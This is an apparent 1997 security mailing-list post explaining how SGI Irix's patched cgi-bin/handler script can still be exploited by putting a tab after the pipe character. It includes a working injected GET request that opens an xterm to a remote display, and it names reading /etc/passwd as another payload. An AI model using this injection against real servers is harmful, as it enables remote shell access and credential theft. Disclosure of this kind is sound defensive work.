s/xwsh/xterm/ and this works the same.
to reiterate Razvan's follow-up to the original posting on the
cgi-bin/handler issue, in Irix 6.3 (O2s) they attempted to fix this with
the line:
# trim off trailing pipes
$doc =~ s/\|*$// ;
which can be fooled by appending a <tab> char after the pipe, thus:
GET /cgi-bin/handler/<tab>;xterm<tab>-display<tab>danish:0<tab>-e<tab>
(one line, emphasis under the necessary change)
which can be applied to the xwsh, or cat /etc/passwd attacks or whatever.
this is not matched by the pattern s/\|*$//, but the appended tab does
not change the behavior of perl's open(yadda, "yadda|") statement since
whitespace following the '|' is ignored.
Yuri's post to Bugtraq of Fri, 16 May 1997 #2551 at
http://www.netspace.org/lsv-archive/bugtraq.html is a good read for more
info on why SGIs /var/www/cgi-bin directory should be nuked with extreme
-- Lamont Granquist <lamontg@hitl.washington.edu> (206)616-1469 fax:(206)543-5380 Human Interface Technology Lab. University of Washington. Seattle, WA PGP pubkey: finger lamontg@near.hitl.washington.edu